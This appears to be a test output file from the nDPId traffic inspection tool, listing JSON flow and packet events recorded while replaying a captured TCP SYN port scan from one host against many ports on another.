-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs0yUAACsGSk2sEAAIQA2GNIzSDtjdUoMYAAAAAGACEAAZtwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsPsoAACgG4aisEAAIQA2GNIzSBGTdUoMYAAAAAGACBAAwKwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsjmsAACkGkQesEAAIQA2GNIzSaXjdUoMYAAAAAGACCADHFgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUoAAC0GBimsEAAIQA2GNIzSFajdUoMYAAAAAGACCAAa5wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsgfEAADMGk4GsEAAIQA2GNIzSG3HdUoMYAAAAAGACEAANHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs3ikAADgGMkmsEAAIQA2GNIzSDd\/dUoMYAAAAAGACBAAmsAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsYZEAAC8Gt+GsEAAIQA2GNIzSBErdUoMYAAAAAGACEAAkRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsGPMAADIG\/X+sEAAIQA2GNIzSB\/ndUoMYAAAAAGACDAAklgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsISwAACoG\/UasEAAIQA2GNIzTHwLdU4MZAAAAAGACDAANigAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAs7lAAACgGMiKsEAAIQA2GNIzTAE\/dU4MZAAAAAGACBAA0PQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAss2wAADYGXwasEAAIQA2GNIzTEVzdU4MZAAAAAGACDAAbMAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsgd0AACsGm5WsEAAIQA2GNIzTKYTdU4MZAAAAAGACEAD\/BwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060392,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_packet_id":1,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060392,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAAC4GfTCsEAAIQA2GNIzTIALdU4MZAAAAAGACDAAMigAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsbe0AADkGoYWsEAAIQA2GNIzTAN7dU4MZAAAAAGACCAAvrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsKzEAAC0G8EGsEAAIQA2GNIzTDOTdU4MZAAAAAGACCAAjqAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAslAAAACgGjHKsEAAIQA2GNIzTF3fdU4MZAAAAAGACBAAdFQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAspNwAACUGfpasEAAIQA2GNIzT\/G\/dU4MZAAAAAGACCAA0HAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADcGgnusEAAIQA2GNIzTBGzdU4MZAAAAAGACEAAkIAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAs65MAADUGJ9+sEAAIQA2GNIzTAh\/dU4MZAAAAAGACCAAubQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVAAAC4G9SKsEAAIQA2GNIzTBAbdU4MZAAAAAGACDAAohgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAAC0G6qGsEAAIQA2GNIzTB9PdU4MZAAAAAGACCAAouQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsZcAAADMGr7KsEAAIQA2GNIzTOpvdU4MZAAAAAGACEADt8AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsdvMAADUGnH+sEAAIQA2GNIzTIyndU4MZAAAAAGACCAANYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060395,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_packet_id":1,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060395,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uAAADMGFpKsEAAIQA2GNIzTBAjdU4MZAAAAAGACEAAkhAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsVEkAADYGvimsEAAIQA2GNIzTBGLdU4MZAAAAAGACDAAoKgAAAgQFtA=="} 